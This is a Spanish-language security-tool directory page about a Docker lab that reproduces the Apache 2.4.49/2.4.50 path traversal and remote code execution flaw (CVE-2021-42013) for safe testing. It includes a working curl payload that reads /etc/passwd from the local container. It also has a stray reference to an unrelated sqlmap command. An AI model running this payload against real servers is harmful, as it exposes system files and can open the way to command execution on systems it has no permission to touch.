Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2021-42013-httpd — CVE: 2021-42013 Probado en: 2.4.49 y 2.4.50 Descripción: Vulnerabilidades de Path Traversal o Remote Code Execution en Apache 2.4.49 y 2.4.50 | Kitploit
Herramientas/GitHubGitHub/cybfar/cve-2021-42013-httpd
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónLabs y Práctica
GitHubcybfar/cve-2021-42013-httpd

cve-2021-42013-httpd

CVE: 2021-42013 Probado en: 2.4.49 y 2.4.50 Descripción: Vulnerabilidades de Path Traversal o Remote Code Execution en Apache 2.4.49 y 2.4.50

Ver Repositorio
11hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Dockerización de una Vulnerabilidad: cve-2021-42013

Este proyecto tiene como objetivo dockerizar una vulnerabilidad específica utilizando Docker. El objetivo es crear un entorno aislado en el cual la vulnerabilidad pueda ser explotada y probada de manera segura.

Aplicación vulnerable

Apache HTTP Server 2.4.50 - Remote Code Execution && Path Transversal

Instalación

Para ejecutar este proyecto, debe tener en su máquina:

  • Docker
  • Python
  • Curl

Una vez instalados los requisitos, puede clonar este repositorio Git en su máquina:

root@kitploit:~
  git clone https://github.com/cybfar/cve-2021-42013-httpd.git

  cd Ccve-2021-42013-httpd

Una vez en el directorio, ejecute el siguiente comando para configurar el entorno vulnerable:

root@kitploit:~
  docker build -t apache-httpd-vuln .
  docker run -p 8000:80 apache-httpd-vuln

Luego acceda a la aplicación en la dirección http://localhost:8000 Si todo va bien, debería ver "It works"

Explotación de la vulnerabilidad

La ejecución de este payload con curl a continuación nos muestra que el objetivo es vulnerable. El script generará el comando sqlmap apropiado para explotar la vulnerabilidad.

root@kitploit:~
  curl -v --path-as-is localhost:8000/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd

Este payload puede acceder directamente a la información relacionada con el usuario en el sistema sin el consentimiento del usuario.

Una vez que hayamos activado los mods cgi o cgid en el servidor, esta vulnerabilidad permitirá a un atacante ejecutar comandos arbitrarios.

Descargar herramienta